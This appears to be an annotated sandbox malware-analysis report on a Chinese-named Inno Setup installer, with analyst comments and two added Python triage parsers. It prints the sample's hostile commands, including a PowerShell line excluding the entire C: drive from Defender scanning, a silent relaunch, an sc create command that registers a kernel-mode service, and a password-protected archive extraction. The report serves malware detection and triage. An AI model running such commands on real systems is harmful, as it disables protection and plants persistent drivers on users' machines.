Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000003.2167941452.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.7.dr, 7zr.exe.7.dr, update.vac.1.dr; String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr; String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F20B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000001.00000000.2079362946.00000000005C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp, 00000007.00000000.2171788772.000000000109D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr, #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr; String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp; Process information set: 01 00 00 00

System Summary

barindex
Source: update.vac.1.dr | Static PE information: section name: .#.q
Source: update.vac.7.dr | Static PE information: section name: .#.q
Source: hrsw.vbc.7.dr | Static PE information: section name: .#.q
(Three dropped PE files with non-executable extensions share the same non-standard section name, which suggests one packer or builder produced all of them.)
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C0B5690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF33886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF33A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF339CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF33D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C0B62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF33D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF33C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF31950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF34754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
(GetCurrentThread followed by NtSetInformationThread, repeated in six functions, is the usual ThreadHideFromDebugger idiom behind the "Hides threads from debuggers" signature; the information class itself is not visible in a static API list, so treat it as probable rather than proven. 7_2_6C0B62D0 enables a token privilege and then calls NtInitiatePowerAction, and 7_2_6BF34754 terminates a process, calls ExitWindowsEx and deletes files between sleeps: these two are the functionality behind "Contains functionality to shutdown / reboot the system". 7_2_6BF31950 opens a handle and issues a DeviceIoControl on it, which fits the \Device\TfSysMon and \Device\TfKbMonPWLCache names found in tProtect.dll further down.)
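The rows above are the raw export of this report's function table: the source path is fused onto "Code function:" and the function id is repeated at the end of each row. The parser below is an added example, not code from Joe Sandbox or from the sample; it splits such rows back into source, function id and API list, and tags API sets that correspond to the signatures discussed above. Its input is five rows copied from this section. The rule names and the API sets that trigger them are my own choices, and the anti-debug tag is only "possible": GetCurrentThread followed by NtSetInformationThread is the usual ThreadHideFromDebugger idiom, but the information class is not visible in a static API list.

```python
import re
from collections import OrderedDict

# Five "Code function" rows copied from this report exactly as the extraction
# fused them. Constructed test input for the parser below.
RAW_ROWS = [
    r"Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF33886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6BF33886",
    r"Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C0B62D0",
    r"Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF31950: CreateFileA,DeviceIoControl,CloseHandle,7_2_6BF31950",
    r"Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF34754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,7_2_6BF34754",
    r"Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6BF44A277_2_6BF44A27",
]

# Function id is <pid>_<run>_<8 hex digits>; the fixed width is what lets us
# split the "7_2_6BF44A277_2_6BF44A27" case where two ids are run together.
ROW = re.compile(
    r"^Source:\s*(?P<source>.*?)Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}):?\s*(?P<apis>.*)$"
)

# Tag fires when every API in the set occurs in the function. Names are mine.
RULES = [
    ("possible_hide_thread_from_debugger", {"NtSetInformationThread", "GetCurrentThread"}),
    ("privileged_power_action", {"AdjustTokenPrivileges", "NtInitiatePowerAction"}),
    ("kill_delete_shutdown", {"TerminateProcess", "DeleteFileA", "ExitWindowsEx"}),
    ("device_ioctl", {"CreateFileA", "DeviceIoControl"}),
    ("process_enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW"}),
]


def parse_row(line):
    """Split one fused report row into source, function id and API calls."""
    m = ROW.match(line)
    if not m:
        return None
    fid = m.group("fid")
    apis = m.group("apis").strip()
    if apis.endswith(fid):            # drop the repeated trailing function id
        apis = apis[: -len(fid)]
    calls = [a for a in apis.split(",") if a]
    return {"source": m.group("source"), "function": fid, "calls": calls}


def tag_calls(calls):
    """Return the rule names whose whole API set is present in the call list."""
    present = set(calls)
    return [name for name, needed in RULES if needed <= present]


def triage_rows(lines):
    """Parse every row and attach behaviour tags, keyed by function id."""
    out = OrderedDict()
    for line in lines:
        row = parse_row(line)
        if row:
            out[row["function"]] = {"calls": row["calls"], "tags": tag_calls(row["calls"])}
    return out


if __name__ == "__main__":
    for fid, info in triage_rows(RAW_ROWS).items():
        print(fid, len(info["calls"]), "calls", info["tags"])
```

Address-only rows parse to an empty call list, so the same function can be fed a whole exported table; rows that do not match the pattern are skipped rather than mis-parsed.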
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code functions (address only, no API names listed): 7_2_6BF44A27, 7_2_6BF34754, 7_2_6C0B1DF0, 7_2_6C0B6FB3, 7_2_6C116CE0, 7_2_6C166D10, 7_2_6C184DE0, 7_2_6C0E8EA1, 7_2_6C102EC9, 7_2_6C16EEF0, 7_2_6C13AEEF, 7_2_6C15E810, 7_2_6C176820, 7_2_6C184870, 7_2_6C134896, 7_2_6C17C8D0, 7_2_6C18A91A, 7_2_6C166900, 7_2_6C17A930, 7_2_6C178950, 7_2_6C0E8972, 7_2_6C186999, 7_2_6C18AA00, 7_2_6C140A52, 7_2_6C174AA0, 7_2_6C100B66, 7_2_6C15AB90, 7_2_6C0F0BCA, 7_2_6C17EBC0, 7_2_6C174489, 7_2_6C1484AC, 7_2_6C16E4D0, 7_2_6C152521, 7_2_6C178520, 7_2_6C16C580, 7_2_6C162580, 7_2_6C1645D0, 7_2_6C17E600, 7_2_6C1846C0, 7_2_6C1767A0, 7_2_6C0EC7CF, 7_2_6C1867C0, 7_2_6C14C7F3, 7_2_6C160020, 7_2_6C16E0E0, 7_2_6C178200, 7_2_6C17C2A0, 7_2_6C163D50, 7_2_6C137D43, 7_2_6C185D90, 7_2_6C169E80, 7_2_6C141F11, 7_2_6C15589F, 7_2_6C1778C8, 7_2_6C1699F0, 7_2_6C15FA50, 7_2_6C161AA0, 7_2_6C15DAD0, 7_2_6C10540A, 7_2_6C16F5C0, 7_2_6C12F5EC, 7_2_6C15B650, 7_2_6C17F640, 7_2_6C1696E0, 7_2_6C189700, 7_2_6C1837C0, 7_2_6C16F050, 7_2_6C103092, 7_2_6C1671F0, 7_2_6C16D280, 7_2_6C16D380, 7_2_6C176AF0, 7_2_6C173750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code functions (address only, no API names listed): 11_2_004081EC, 11_2_004481C0, 11_2_00458240, 11_2_00434250, 11_2_0045C3C0, 11_2_004504C8, 11_2_00438650, 11_2_00410943, 11_2_0043C950, 11_2_00438C20, 11_2_00450E00, 11_2_00454EA0, 11_2_0044D089, 11_2_004210AC, 11_2_00451120, 11_2_004591C0, 11_2_0043D1D0, 11_2_00445180, 11_2_0045D2C0, 11_2_004253F3, 11_2_003C53CF, 11_2_0045D470, 11_2_004554D0, 11_2_0040D496, 11_2_00451550, 11_2_003C1572, 11_2_00419652, 11_2_0044D6A0, 11_2_003D9766, 11_2_003C97CA, 11_2_0045D9E0, 11_2_003C1AA1, 11_2_00445E80, 11_2_00445F80, 11_2_003DE00A, 11_2_004422E0, 11_2_00462300, 11_2_0042E49F, 11_2_004425F0, 11_2_004366D0, 11_2_0043A6A0, 11_2_0045E990, 11_2_00442A80, 11_2_0041AB11, 11_2_00446CE0, 11_2_004470D0, 11_2_0042B121, 11_2_0043B180, 11_2_00457200, 11_2_0045F3C0, 11_2_003EB3E4, 11_2_0044F3A0, 11_2_00437410, 11_2_0044F420, 11_2_0043F500, 11_2_0046351A, 11_2_00453530, 11_2_0045F599, 11_2_00463601, 11_2_004577C0, 11_2_00433790, 11_2_003EF8E0, 11_2_0043F910, 11_2_00413AEF, 11_2_00447AF0, 11_2_003DBAC9, 11_2_00447C50, 11_2_003DBC92, 11_2_0043FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: String function: 6C186F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: String function: 6C0E9240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 003C1E40 appears 172 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 0045FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 003C28E3 appears 34 times
(Everything attributed to 7zr.exe, including the privilege adjustment, comes from the bundled 7-Zip console tool rather than from code the attacker wrote; the relevant finding about 7zr.exe is how it is invoked, see the process tree below.)
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Static PE information: Number of sections : 11 > 10
(A 32-bit installer stage carrying a 64-bit console executable as RT_RCDATA is consistent with Inno Setup's embedded 64-bit helper; extract and hash the resource before treating it as a second payload.)
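Three dropped files share the section name .#.q, and the sample and its .tmp stage carry 11 sections. The block below is an added example, not code from the report or from the sample: a minimal PE section-table parser that reproduces those two static checks (non-standard section name, more than ten sections) and adds the writable-plus-executable check a practitioner would run alongside them. Its input is a constructed PE32 header built inside the block; the section names other than .#.q are assumed for illustration, and the 0x60000020 / 0xE0000020 characteristics are the standard IMAGE_SCN flag combinations for code and for RWX code.

```python
import re
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Section names normally consist of letters, digits, '.', '_' and '$'.
NORMAL_NAME = re.compile(rb"^[A-Za-z0-9._$]+$")


def parse_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table.
    Returns (Machine, [section dicts]); raises ValueError on a non-PE."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsec, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size              # section table follows the optional header
    sections = []
    for i in range(nsec):
        (name, vsize, va, rsize, raw, _prel, _plin, _nrel, _nlin, flags) = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rsize,
                         "raw_ptr": raw, "characteristics": flags})
    return machine, sections


def triage_sections(data, max_sections=10):
    """Return the static anomalies: too many sections, odd names, RWX sections."""
    _machine, sections = parse_sections(data)
    findings = []
    if len(sections) > max_sections:
        findings.append("section count %d > %d" % (len(sections), max_sections))
    for s in sections:
        if not NORMAL_NAME.match(s["name"]):
            findings.append("section name with special chars: %r" % s["name"])
        if (s["characteristics"] & IMAGE_SCN_MEM_EXECUTE) and (s["characteristics"] & IMAGE_SCN_MEM_WRITE):
            findings.append("writable+executable section: %r" % s["name"])
    return findings


def build_sample_pe(names, flags=None):
    """Constructed minimal PE32 header with the given section names: enough for
    the header parser, deliberately not a loadable image."""
    flags = flags or {}
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew at 0x3C -> 0x40
    opt_size = 0xE0                                            # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)    # PE32 magic, rest zeroed
    table = b""
    for i, name in enumerate(names):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                             0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags.get(name, 0x60000020))
    return dos + b"PE\0\0" + coff + opt + table


# 11 sections as in this report's sample; only ".#.q" is taken from the report,
# the other names are assumed. ".#.q" is additionally made RWX for the example.
SAMPLE_NAMES = [b".text", b".rdata", b".data", b".rsrc", b".reloc", b".#.q",
                b".idata", b".tls", b".pdata", b".xdata", b".bss"]
SAMPLE_PE = build_sample_pe(SAMPLE_NAMES, {b".#.q": 0xE0000020})

if __name__ == "__main__":
    for line in triage_sections(SAMPLE_PE):
        print(line)
```

On a real file, replace SAMPLE_PE with the bytes read from disk; the parser reads only the headers, so it is safe to run on the dropped update.vac and hrsw.vbc files without executing anything.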
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2077742649.000000007F50A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName b1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000000.2075082721.0000000000589000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName b1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.000000000309E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName b1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Binary or memory string: OriginalFileName b1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
(The version resource names the file b1saMLk3dvZDYVRF.exe, a random-looking string that does not match the name it was distributed under; the OriginalFilename is a useful pivot for hunting other builds.)
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.13.dr | Binary string: \Device\TfKbMonPWLCache
(tProtect.dll is the image registered as the kernel service CleverSoar below; the two device names are the objects a user-mode component would open to talk to it.)
Source: classification engine | Classification label: mal84.evad.winEXE@133/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C0B62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_003C9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_003D3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_003C9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C0B57B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\is-SM8KP.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:<pid>:120:WilError_03 for pids 5240, 1440, 5564, 4456, 6800, 4676, 3128, 2364, 4816, 3528, 4308, 940, 1272, 5492, 7164, 2612, 6572, 2940, 3640, 6412, 2140, 6332, 1996, 6180, 5808, 7056, 3192, and \Sessions\1\BaseNamedObjects\Local\SM0:<pid>:120:WilError_03 for pids 1292, 1896, 3720 (30 mutants in total)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
(The WilError_03 mutants are created by every conhost.exe instance; thirty of them only reflect how many console processes the cmd/sc loop below spawned and are not an indicator specific to this sample.)
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 times)
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 times)
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 times)
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
(The Delphi\Locales lookups, the is-XXXXX.tmp staging directories, the /SL5= and /LOADINF switches and the Safer\CodeIdentifiers check are all standard Inno Setup behaviour. They identify the outer layer as an Inno Setup package; the malicious actions are what the setup script executes, in the process tree below.)
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
(This excludes the entire system drive from Defender scanning before anything else is dropped. The command line is in clear text here; the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma hit in the overview refers to the same cmdlet, so detections should cover both forms.)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
(The installer re-launches itself with /VERYSILENT, so the second stage runs without any UI.)
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
(A kernel-mode service whose image is a .dll under Program Files (x86)\Windows NT rather than a .sys under System32\drivers is the strongest single indicator in this tree; whether the driver actually loaded is not established by the sc create line alone.)
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
